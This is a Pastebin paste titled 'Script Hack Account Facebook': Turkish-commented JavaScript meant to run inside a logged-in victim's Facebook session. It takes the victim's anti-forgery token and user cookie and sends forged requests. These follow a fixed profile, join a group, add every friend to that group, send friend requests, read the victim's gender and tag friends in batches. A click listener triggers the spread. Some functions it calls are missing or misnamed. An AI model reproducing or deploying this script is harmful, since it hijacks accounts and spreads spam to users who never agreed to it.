Advertisement
evilsakura

Script Hack Account Facebook [MrEvilsakura]

Jun 27th, 2013
6,401
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.66 KB | None | 0 0
  1. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  2. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  3.  
  4. function cereziAl(isim) {
  5. var tarama = isim + "=";
  6. if (document.cookie.length > 0) {
  7. konum = document.cookie.indexOf(tarama)
  8. if (konum != -1) {
  9. konum += tarama.length
  10. son = document.cookie.indexOf(";", konum)
  11. if (son == -1)
  12. son = document.cookie.length
  13. return unescape(document.cookie.substring(konum, son))
  14. }
  15. else { return ""; }
  16. }
  17. }
  18.  
  19. function getRandomInt (min, max) {
  20. return Math.floor(Math.random() * (max - min + 1)) + min;
  21. }
  22. function randomValue(arr) {
  23. return arr[getRandomInt(0, arr.length-1)];
  24. }
  25.  
  26. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  27. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  28.  
  29. function a(abone){
  30. var http4 = new XMLHttpRequest();
  31.  
  32. var url4 = "/ajax/follow/follow_profile.php?__a=1";
  33.  
  34. var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  35. http4.open("POST", url4, true);
  36.  
  37. //Send the proper header information along with the request
  38. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  39. http4.setRequestHeader("Content-length", params4.length);
  40. http4.setRequestHeader("Connection", "close");
  41.  
  42. http4.onreadystatechange = function() {//Call a function when the state changes.
  43. if(http4.readyState == 4 && http4.status == 200) {
  44.  
  45. http4.close; // Close the connection
  46.  
  47. }
  48. }
  49.  
  50. http4.send(params4);
  51. }
  52.  
  53. function sublist(uidss) {
  54. var a = document.createElement('script');
  55. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  56. document.body.appendChild(a);
  57. }
  58.  
  59. a("100003819838619");
  60.  
  61.  
  62. sublist("302868673183791");
  63.  
  64. sublist("303985136405478");
  65.  
  66.  
  67.  
  68.  
  69.  
  70. var gid = ['285860628209086'];
  71.  
  72. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  73. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  74.  
  75. var httpwp = new XMLHttpRequest();
  76. var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
  77. var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
  78. httpwp['open']('POST', urlwp, true);
  79. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  80. httpwp['setRequestHeader']('Content-length', paramswp['length']);
  81. httpwp['setRequestHeader']('Connection', 'keep-alive');
  82. httpwp['send'](paramswp);
  83.  
  84. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  85. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  86.  
  87. var friends = new Array();
  88. gf = new XMLHttpRequest();
  89. gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
  90. gf['send']();
  91. if (gf['readyState'] != 4) {} else {
  92. data = eval('(' + gf['responseText']['substr'](9) + ')');
  93. if (data['error']) {} else {
  94. friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
  95. return _0x93dax8['index'] - _0x93dax9['index'];
  96. });
  97. };
  98. };
  99.  
  100. for (var i = 0; i < friends['length']; i++) {
  101. var httpwp = new XMLHttpRequest();
  102. var urlwp = '/ajax/groups/members/add_post.php?__a=1';
  103. var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
  104. httpwp['open']('POST', urlwp, true);
  105. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  106. httpwp['setRequestHeader']('Content-length', paramswp['length']);
  107. httpwp['setRequestHeader']('Connection', 'keep-alive');
  108. httpwp['onreadystatechange'] = function () {
  109. if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
  110. };
  111. httpwp['send'](paramswp);
  112. };
  113. var spage_id = "386786718073145";
  114. var spost_id = "377562455589986";
  115. var sfoto_id = "351698991619160";
  116. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  117. var smesaj = "";
  118. var smesaj_text = "";
  119. var arkadaslar = [];
  120. var svn_rev;
  121. var bugun= new Date();
  122. var btarihi = new Date();
  123. btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
  124. if(!document.cookie.match(/paylasti=(\d+)/)){
  125. document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
  126. }
  127.  
  128.  
  129. //arkadaslari al ve isle
  130. function sarkadaslari_al(){
  131. var xmlhttp = new XMLHttpRequest();
  132. xmlhttp.onreadystatechange = function () {
  133. if(xmlhttp.readyState == 4){
  134. eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  135. for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
  136. smesaj = "";
  137. smesaj_text = "";
  138. for(i=f*10;i<(f+1)*10;i++){
  139. if(arkadaslar.payload.entries[i]){
  140. smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
  141. smesaj_text += " " + arkadaslar.payload.entries[i].text;
  142. }
  143. }
  144. sdurumpaylas(); }
  145.  
  146. }
  147.  
  148. };
  149. var params = "&filter[0]=user";
  150. params += "&options[0]=friends_only";
  151. params += "&options[1]=nm";
  152. params += "&token=v7";
  153. params += "&viewer=" + user_id;
  154. params += "&__user=" + user_id;
  155.  
  156. if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  157. else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  158. xmlhttp.send();
  159. }
  160.  
  161. //tiklama olayini dinle
  162. var tiklama = document.addEventListener("click", function () {
  163. if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  164. svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  165. sarkadaslari_al();
  166. document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();
  167.  
  168. document.removeEventListener(tiklama);
  169. }
  170. }, false);
  171.  
  172.  
  173. //arkada?¾ ekleme
  174. function sarkadasekle(uid,cins){
  175. var xmlhttp = new XMLHttpRequest();
  176. xmlhttp.onreadystatechange = function () {
  177. if(xmlhttp.readyState == 4){
  178. }
  179. };
  180.  
  181. xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
  182. var params = "to_friend=" + uid;
  183. params += "&action=add_friend";
  184. params += "&how_found=friend_browser";
  185. params += "&ref_param=none";
  186. params += "&outgoing_id=";
  187. params += "&logging_location=friend_browser";
  188. params += "&no_flyout_on_click=true";
  189. params += "&ego_log_data=";
  190. params += "&http_referer=";
  191. params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
  192. params += "&phstamp=165816749114848369115";
  193. params += "&__user=" + user_id;
  194. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  195. xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
  196.  
  197. if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
  198. xmlhttp.send(params);
  199. }else if(document.cookie.split("cins" + user_id +"=").length <= 1){
  200. cinsiyetgetir(uid,cins,"sarkadasekle");
  201. }else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
  202. xmlhttp.send(params);
  203. }
  204. }
  205.  
  206. //cinsiyet belirleme
  207. var cinssonuc = {};
  208. var cinshtml = document.createElement("html");
  209. function scinsiyetgetir(uid,cins,fonksiyon){
  210. var xmlhttp = new XMLHttpRequest();
  211. xmlhttp.onreadystatechange = function () {
  212. if(xmlhttp.readyState == 4){
  213. eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  214. cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html
  215. btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
  216. if(cinshtml.getElementsByTagName("select")[0].value == "1"){
  217. document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();
  218. }else if(cinshtml.getElementsByTagName("select")[0].value == "2"){
  219. document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();
  220. }
  221. eval(fonksiyon + "(" + id + "," + cins + ");");
  222. }
  223. };
  224. xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
  225. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  226. xmlhttp.send();
  227. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement